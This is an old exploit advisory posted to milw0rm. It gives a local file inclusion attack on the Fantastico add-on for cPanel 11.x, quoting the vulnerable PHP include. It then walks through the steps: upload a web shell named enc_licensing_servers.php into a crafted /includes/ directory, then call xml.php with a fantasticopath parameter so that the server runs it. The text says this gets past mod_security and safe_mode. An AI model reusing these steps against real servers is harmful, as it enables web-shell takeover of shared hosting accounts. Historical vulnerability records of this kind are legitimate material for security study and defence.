############################################################## Fantastico In all Version Cpanel 11.x <= local File Include ############################################################## Must login to :2082 To break the protection mod_security & safe_mode: off & Disable functions : all none Vulnerable Code $licensing_servers=$fantasticopath . "/includes/enc_licensing_servers.php"; if (is_file($licensing_servers)) { include($licensing_servers); in http://xx.com:2082/frontend/x/fantastico/includes/xml.php Exploit >> First Create directory Let the name /includes/ and upload Shell.php in /includes/ Then rename it to enc_licensing_servers.php :::xploit:::: http://xxx.com:2082/frontend/x/fantastico/includes/xml.php?fantasticopath=/home/user ################################################### Discoverd By : joker_1 for info : pl57@msn.com ################################################### Special Greetings :- sniper-sa.com & Group XP & Alm3reFh.Com & Genral kbkb & step on the snow & red trigger & qalbhamad & saudi star ################################################### # milw0rm.com [2008-09-14]